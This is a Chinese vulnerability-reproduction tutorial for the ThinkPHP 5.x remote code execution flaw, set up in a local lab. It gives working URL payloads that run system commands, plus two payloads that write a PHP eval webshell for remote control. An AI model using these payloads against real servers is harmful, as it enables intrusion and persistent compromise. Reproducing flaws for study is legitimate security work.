thinkphp远程代码执行教程(ThinkPHP 5.x远程命令执行漏洞复现)
thinkphp远程代码执行教程
ThinkPHP 5.x远程命令执行漏洞复现一、漏洞描述
2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞:
https://blog.thinkphp.cn/869075
漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。
二、漏洞影响版本
Thinkphp 5.x-Thinkphp 5.1.31
Thinkphp 5.0.x<=5.0.23
三、漏洞复现
1、官网下载Thinkphp 5.0.22,下载地址: http://www.thinkphp.cn/donate/download/id/1260.html
2、使用phpstudy搭建环境,解压下载的Thinkphp5.0.22到网站目录下,浏览器访问http://192.168.10.171/thinkphp5.0.22/public
3、利用system函数远程命令执行
Payload如下:
- ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
4、通过phpinfo函数查看phpinfo()的信息
Payload如下:
- ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
5、写入shell
Payload如下:
- ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php
注意:需要对特殊字符使用^转义(cmd环境下转义方式),windows环境的echo命令输出字符串到文档不用引号(单引号、双引号),部分字符url编码不编码都行。
6、查看是否成功写入shell
7、菜刀连接
8、第二种的写入shell的方法
Payload如下:
- ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php @eval($_POST[test]);?>
9、查看是否成功写入文件
10、菜刀连接
总结
以上所述是小编给大家介绍的ThinkPHP 5.x远程命令执行漏洞复现,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对我们网站的支持!
如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!
原文链接:https://www.cnblogs.com/yuzly/p/11460285.html
- php防sql注入(万能密码的SQL注入漏洞其PHP环境搭建及防御手段)
- dedecms授权协议(360提示DedeCms全局变量覆盖漏洞临时解决方法)
- 织梦cms漏洞大全(织梦CMS利用php正则让文章的外链自动加nofollow)
- vmware vcenter怎么用安全(关于Vmware vcenter未授权任意文件上传漏洞CVE-2021-21972的问题)
- nginx过滤器漏洞(Nginx反爬虫策略,防止UA抓取网站)
- docker的漏洞(一次docker错误的耗时排查过程记录)
- dedecms漏洞防范(浅析DedeCMS投票模块漏洞的解决方法)
- php漏洞处理方法(php解决安全问题的方法实例)
- dedecms替代方案(DedeCMS投票模块漏洞解决方法)
- dedecms屏蔽规则(织梦dedecms修改任意管理员漏洞处理方法)
- dedecms提示怎么去除(DEDECMS系统后台会员功能漏洞解决方法)
- 宝塔面板网站搭建没锁定文件(宝塔面板曝出严重安全漏洞!站长需赶紧升级到最新版本)
- web安全漏洞怎么解决(Web服务器常见8种安全漏洞)
- 织梦cms漏洞怎么解决(织梦cms、帝国cms、PHPcms优缺点解析)
- thinkphp远程代码执行教程(ThinkPHP 5.x远程命令执行漏洞复现)
- python网络爬虫案例实战(python爬取cnvd漏洞库信息的实例)
- 三杨 共辅四朝帝王,构建明帝国内阁行政圈(三杨共辅四朝帝王)
- 红色文化进国企(红色文化进国企)
- 车友的选择| 轮毂该如何选(车友的选择轮毂该如何选)
- 秦海璐炫耀和王新军热恋蜜事,不料对方吐槽她吃饱后肚子撅老高(秦海璐炫耀和王新军热恋蜜事)
- 秦海璐一袭旗袍惹人倾心,将高级与淡雅展现的游刃有余(秦海璐一袭旗袍惹人倾心)
- 门外之见 海蛎子味 的表演,能走多远(门外之见海蛎子味)
热门推荐
- javascript学习参数(详解JavaScript堆栈与拷贝)
- php常见加密方法(PHP实现的AES 128位加密算法示例)
- html中table怎么用(详解CSS的table-layout属性的用法)
- sqlserver触发器编写(SQLSever中的触发器基本语法与作用)
- VS中项目生成顺序
- mysql慢日志设置多少合适(MySQL慢查询日志的作用和开启)
- div内容水平垂直居中的方法(不定宽高的文字在div中垂直居中实现方法)
- linux如何进入makefile(linux中无make命令的问题make: *** 没有指明目标并且找不到 makefile及make命令安装方)
- pythonflask怎么设置(python flask安装和命令详解)
- navicat连接数据库报密码错误(navicat 连接数据库隔段时间后自动断开连接的解决方案)
排行榜
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9